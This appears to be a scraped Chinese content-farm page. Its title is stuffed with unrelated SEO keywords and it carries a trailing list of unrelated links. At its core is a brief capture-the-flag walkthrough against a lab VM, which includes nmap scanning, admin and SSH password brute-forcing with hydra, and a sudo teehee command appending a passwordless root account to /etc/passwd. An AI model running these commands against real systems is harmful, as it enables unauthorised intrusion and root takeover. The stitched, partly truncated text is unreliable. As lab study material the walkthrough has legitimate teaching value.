当前位置: 首页 > news >正文

佛山移动网站建设公司单页面网站入侵

佛山移动网站建设公司,单页面网站入侵,电商网站如何存储图片,js网站繁体kali:192.168.111.111 靶机:192.168.111.251 信息收集 端口扫描 nmap -A -v -sV -T5 -p- --scripthttp-enum 192.168.111.251 访问目标网站发现需要登录 使用账号admin爆破出密码:happy 登陆后抓包执行反弹shell 提权 在/home/jim/backu…

kali:192.168.111.111

靶机:192.168.111.251

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.251

访问目标网站发现需要登录

使用账号admin爆破出密码:happy

登陆后抓包执行反弹shell

提权

在/home/jim/backups目录下发现密码字典

利用该字典爆破jim用户密码

hydra -l jim -P pass.txt 192.168.111.251 -s 22 ssh -t 64

查看jim用户的邮件发现用户charles的密码:^xHhA&hvim0y

charles的sudo权限

提权方法:tee | GTFOBins

写入用户到/etc/passwd

echo 'a::0:0::/root:/bin/bash' | sudo -u root teehee -a "/etc/passwd"
su a

flag

http://www.yayakq.cn/news/129494/

相关文章:

  • 网站设计流程是舞蹈网站模版
  • 网站logo设计制作前端开发培训找不到工作
  • 找关键词的网站推荐网站网页
  • ps制作网站电子商务网站开发常用工具
  • 什么软件可以做动漫视频网站网站制作 连云港
  • 设计网官方网站在线设计logo商标免费无水印
  • 做网站 页面自适应陕西高速公路建设集团公司网站
  • 自助建设视频网站重庆可作为推广的网站
  • 山西做网站怎么样政务门户网站建设方案
  • 游戏公司官方网站模版泰州城乡建设网站
  • 做直播网站用什么系统机械网站优化
  • 古玩网站建设意义商丘网站公司
  • 网站分析内容北京所有做招聘类网站建站公司
  • 网站建设公司 信科便宜求大神帮忙做网站
  • 南郊做网站网站建设分金手指专业十七
  • alexa全球网站排名分析华龙区乡村网站建设
  • 合肥制作网站企业网站开发用技术
  • 天津网站推广公司哪家好那些行业需要做网站
  • 长沙企业网站建设企业网上开平台要多少钱
  • 公司做网站费用家乡网站建设策划书模板
  • 手把手教你做网站京津冀协同发展图片
  • 给人家做的网站想改怎么改使用公网ip做网站地址
  • 可以直接进入网站的正能量根据颜色找网站
  • 哈尔滨做网站哈尔滨学院网络服务商是指
  • 家居行业网站建设手机网站内容规划
  • 设计企业网络方案的五个步骤惠州抖音seo
  • 南昌市建设规费标准网站自己做的网站做登录
  • 视频资源的网站怎么做旅游时政热点新闻
  • 南京做网站建设的公司百度关键词优化是什么意思
  • 我做的网站服务器别人没法左键点击下载呢天津哪里建网站好